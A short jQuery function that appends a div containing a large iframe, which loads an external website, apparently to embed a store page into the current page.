function addbody(){
	var top = 0;
	$("body").append("<div id='whole'><div id='newstore'><iframe src='http://www.enjoyparty.ro/' frameborder='0' width='1600' height='3000'></iframe></div></div>");
	if(top<0)top = 0;
	$("#newstore").css("top", top + "px");

}
